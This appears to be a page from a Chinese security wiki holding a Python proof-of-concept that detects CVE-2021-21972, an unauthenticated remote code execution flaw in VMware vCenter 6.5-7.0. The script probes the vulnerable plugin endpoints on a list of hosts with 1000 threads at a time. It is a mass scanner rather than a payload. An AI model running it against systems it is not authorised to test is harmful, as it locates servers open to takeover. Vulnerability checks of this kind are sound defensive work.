menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right yougar0.github.io(基于零组公开漏洞库 + PeiQi文库的一些漏洞)-20210715 chevron_right Web安全 chevron_right Vmware vCenter chevron_right CVE-2021-21972 vCenter 6.5-7.0 RCE 漏洞检测POC.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    CVE-2021-21972 vCenter 6.5-7.0 RCE 漏洞检测POC.md
    1.69 KB / 2021-04-21 09:23:46
        # CVE-2021-21972 vCenter 6.5-7.0 RCE 漏洞检测POC
    
    poc如下
    
    ```python
    import requests
    import threading
    import warnings
    warnings.filterwarnings("ignore")
    
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36",
    }
    
    
    def run(thread_function, *args):
        threads = []
        for par in args[0]:
            thread = threading.Thread(target=thread_function, args=par)
            threads.append(thread)
            thread.start()
        for t in threads:
            t.join()
    
    
    def poc(*args):
        try:
            url = args[0]
            url1 = url + '/ui/vropspluginui/rest/services/getstatus'
            url1 = url1[:7] + url1[7:].replace("//", "/")
            res = requests.get(url1, headers=headers, verify=False, timeout=5)
            if res.status_code == 200 and '{"States":' in res.text:
                print([url, url1, "存在漏洞:Unauthorized RCE in VMware vCenter", res.text[:50]])
                return True
            url2 = url + '/ui/vropspluginui/rest/services/uploadova'
            url2 = url2[:7] + url2[7:].replace("//", "/")
            res = requests.post(url2, headers=headers, verify=False, timeout=5)
            if res.status_code == 500 and '{"stackTrace":' in res.text:
                print([url, url2, "存在漏洞:Unauthorized RCE in VMware vCenter", res.text[:50]])
                return True
        except:
            pass
    
    
    with open("url.txt") as f:
        urllist = [(i.strip(),) for i in f.readlines()]
        # print(urllist)
    
    thread_num = 1000
    for num in range(0, len(urllist), thread_num):
        start = num
        end = start + thread_num
        run(poc, urllist[start:end])
    ```
    
    links
    file_download